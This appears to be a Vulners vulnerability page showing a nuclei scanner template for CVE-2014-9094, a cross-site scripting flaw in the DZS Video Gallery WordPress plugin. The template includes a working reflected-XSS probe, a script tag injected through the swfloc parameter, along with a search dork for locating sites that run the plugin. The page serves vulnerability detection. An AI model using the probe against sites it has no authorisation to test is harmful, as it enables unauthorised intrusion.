Lucene search
+L

WordPress DZS-VideoGallery Plugin Cross-Site Scripting

🗓️ 17 Aug 2026 03:58:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

WordPress DZS-VideoGallery Plugin Cross-Site Scripting CVE-2014-9094 allows remote attackers to inject arbitrary web script or HTML via swfloc or designrand parameter. Potential for session hijacking, defacement, or theft of sensitive information. Update to latest plugin version for fix

Related
Refs
Code
id: CVE-2014-9094

info:
  name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9094
    - http://websecurity.com.ua/7152/
    - http://seclists.org/fulldisclosure/2014/Jul/65
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2014-9094
    cwe-id: CWE-79
    epss-score: 0.07309
    epss-percentile: 0.93838
    cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: digitalzoomstudio
    product: "video_gallery"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\""
  tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Video Gallery WordPress DZS'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022004c613478eadc9eda83c3327303d71ce69705d78730a2ff8912ed6810611c21a022079400a9ede9cd8787736e1796bfa7506d7a373f2dc70630554e2d2f8cd644906:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 24.3
EPSS0.07309
39